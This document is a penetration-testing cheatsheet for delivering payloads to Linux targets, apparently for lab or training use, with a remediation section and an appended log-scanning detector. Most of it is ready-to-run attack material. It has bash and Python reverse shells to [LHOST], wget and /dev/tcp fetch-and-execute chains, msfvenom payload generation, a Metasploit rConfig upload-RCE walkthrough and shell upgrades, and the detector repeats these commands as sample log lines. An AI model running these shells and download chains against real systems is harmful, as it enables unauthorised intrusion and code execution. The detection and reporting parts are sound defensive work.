🛡️ Methodology Checklist

  • Identify remote code execution vector (command injection, LFI, webshell, exploit)
  • Select shell payload matching execution context
  • Bash reverse: bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1
  • Python: python3 -c "import socket,subprocess,os;s=socket.socket();s.connect(('[LHOST]',[LPORT]));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"
  • Perl: perl -e "use Socket;..."
  • Start listener before executing payload
  • Stabilise shell immediately after connection

🎯 Operational Context

Use when: delivering a payload to a Linux target; select the transfer method based on what's available: curl, wget, Python HTTP, SCP, /dev/tcp.
Think Dumber First: wget http://[LHOST]/shell.elf -O /tmp/s && chmod +x /tmp/s && /tmp/s is three commands. Host the file with python3 -m http.server 80. If wget/curl are blocked, try /dev/tcp: cat < /dev/tcp/[LHOST]/80 > /tmp/s.
Skip when: the target has no outbound connectivity; use a local exploit or an exploit delivery chain instead.


⚡ Tactical Cheatsheet

Command | Tactical Outcome
ping [TARGET_IP] | Check TTL: ~64 = Linux/Unix
nmap -sC -sV [TARGET_IP] | Enumerate services and versions
searchsploit [application] [version] | Search local exploit DB
msf6 > search rconfig | Search Metasploit for application exploit
use exploit/linux/http/rconfig_vendors_auth_file_upload_rce | rConfig 3.9.6 authenticated file upload RCE
set RHOSTS [TARGET_IP]; set LHOST tun0; exploit | Run Linux web app exploit
msfvenom -p linux/x64/shell_reverse_tcp LHOST=[LHOST] LPORT=443 -f elf > shell.elf | Generate Linux ELF reverse shell (LHOST is the listener, not the target)
chmod +x shell.elf && ./shell.elf | Execute generated payload
python -c 'import pty; pty.spawn("/bin/sh")' | Upgrade to TTY after catching shell
which python python3 perl ruby lua gcc | Identify available languages on target

🔬 Deep Dive & Workflow

Linux Infiltration Methodology

Answer these four questions before choosing an attack vector:

  1. Distribution: Ubuntu, CentOS, Debian? Affects package availability and kernel exploits
  2. Languages: Python, Perl, PHP, GCC? Determines payload options
  3. Function: Web server, DB, internal tool? Determines attack surface
  4. Applications: CMS, network manager, API? Look up CVEs for specific versions

Service Enumeration → Exploitation

# Standard service scan
nmap -sC -sV [TARGET_IP]

# Key findings to focus on:
# - Port 80/443: Web apps → look for CMS, version numbers in footers/headers
# - Port 8080/8443: Tomcat, Jenkins, alternative web
# - Port 3306: MySQL → default creds attempt
# - Port 21: FTP → anonymous login attempt

Web Application Exploit Workflow (rConfig Example)

# 1. Find version in UI footer or page source
# 2. Search for exploit
msf6 > search rconfig
msf6 > use exploit/linux/http/rconfig_vendors_auth_file_upload_rce
 
# 3. Configure
set RHOSTS 10.129.201.101
set LHOST tun0
exploit

What the exploit does:

  1. Checks rConfig version
  2. Logs in (default/weak creds)
  3. Uploads a randomized PHP payload
  4. Triggers it via HTTP access
  5. Deletes the file (auto-cleanup)

Result: Meterpreter session opened

Manual Module Installation

If Metasploit lacks a module, install it manually from the Rapid7 GitHub repository:

# Place in user module path:
~/.msf4/modules/exploits/linux/http/

# Or system path:
/usr/share/metasploit-framework/modules/exploits/linux/http/

# Or update the Metasploit package to pull in newly released modules:
apt update && apt install metasploit-framework

Post-Exploitation: From Non-TTY to Shell

After catching a shell from a web exploit, you often land in a limited non-TTY environment:

# No prompt, no su, no interactive editors
# Fix with Python:
which python python3
python -c 'import pty; pty.spawn("/bin/sh")'
# or
python3 -c 'import pty; pty.spawn("/bin/bash")'

Prompt changes from blank to sh-4.2$ or bash-4.2$: fully interactive.

Footprinting Enumeration Before Exploitation

  • Check /robots.txt and page source for version numbers
  • Use Wappalyzer or whatweb to fingerprint technology stack
  • Google: [application] [version] exploit / [CVE] PoC
  • Check searchsploit [application] for local exploit-db entries

🛠️ Troubleshooting & Edge Cases

Problem | Cause | Fix
wget/curl not available | Minimal OS install | Use /dev/tcp: exec 3<>/dev/tcp/[LHOST]/80; echo -e 'GET /shell HTTP/1.0\r\n\r\n' >&3; cat <&3 > /tmp/s (the request must end with a blank line)
File downloads but won't execute | noexec on /tmp | Copy to /dev/shm/ or /var/tmp/; or execute directly: bash /tmp/script.sh
HTTP server returns connection refused | Python server not started | Start: python3 -m http.server 80 in directory with payload
SCP transfer fails | SSH key auth required | Use password: scp -o PreferredAuthentications=password payload [USER]@[TARGET]:/tmp/
Payload checksum mismatch after transfer | Transfer corruption | Verify: compare md5sum /tmp/payload on target vs local; use --content-disposition with wget

📝 Reporting Trigger

Finding Title: Payload Delivery to Linux Target Achieves Code Execution
Impact: Successful payload delivery and execution on a Linux target provides an attacker-controlled process running under the target service account with access to local credentials, network, and filesystem.
Root Cause: Unrestricted outbound HTTP from server workloads allows payload retrieval. No integrity verification of downloaded content before execution.
Recommendation: Implement an outbound HTTP proxy with allowlisting for server workloads. Mount /tmp with the noexec flag. Deploy file integrity monitoring. Apply SELinux/AppArmor profiles to restrict spawned process capabilities.
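As a defender-side addition (this code is not part of the original cheatsheet), the following Python scans process-execution log lines for the delivery and TTY-upgrade patterns listed above and maps each hit to the control from the reporting section that addresses it. The simplified "user command" log format and the sample lines are constructed assumptions; a real auditd execve record would need to be decoded into a command line first.

```python
import re
from dataclasses import dataclass

# Each signature is a pattern for a technique this page lists, paired with the
# control from the reporting section that would block or surface it.
SIGNATURES = [
    ("payload-download-to-tmp",
     re.compile(r"\b(?:wget|curl)\b.*https?://\S+.*(?:-O|-o|>)\s*/(?:tmp|dev/shm|var/tmp)/"),
     "outbound HTTP allowlisting for server workloads"),
    ("dev-tcp-transfer",
     re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
     "egress filtering: bash /dev/tcp needs no client binary, so watch outbound connections"),
    ("chmod-exec-in-tmp",
     re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+/(?:tmp|dev/shm|var/tmp)/"),
     "noexec on /tmp, /dev/shm and /var/tmp plus file integrity monitoring"),
    ("pty-upgrade",
     re.compile(r"pty\.spawn\("),
     "SELinux/AppArmor profile that stops the service account spawning interactive shells"),
]


@dataclass
class Finding:
    line_no: int
    name: str
    control: str


def scan(lines):
    """Return one Finding per matching (line, signature) pair, in log order."""
    findings = []
    for n, line in enumerate(lines, 1):
        for name, pattern, control in SIGNATURES:
            if pattern.search(line):
                findings.append(Finding(n, name, control))
    return findings


# Constructed sample lines (not from any real host): "<user> <command line>".
SAMPLE_LOG = [
    "www-data wget http://10.0.0.5/shell.elf -O /tmp/s",
    "www-data chmod +x /tmp/s",
    "www-data cat < /dev/tcp/10.0.0.5/80 > /tmp/s",
    "www-data python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "root apt update",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.name} -> {f.control}")
```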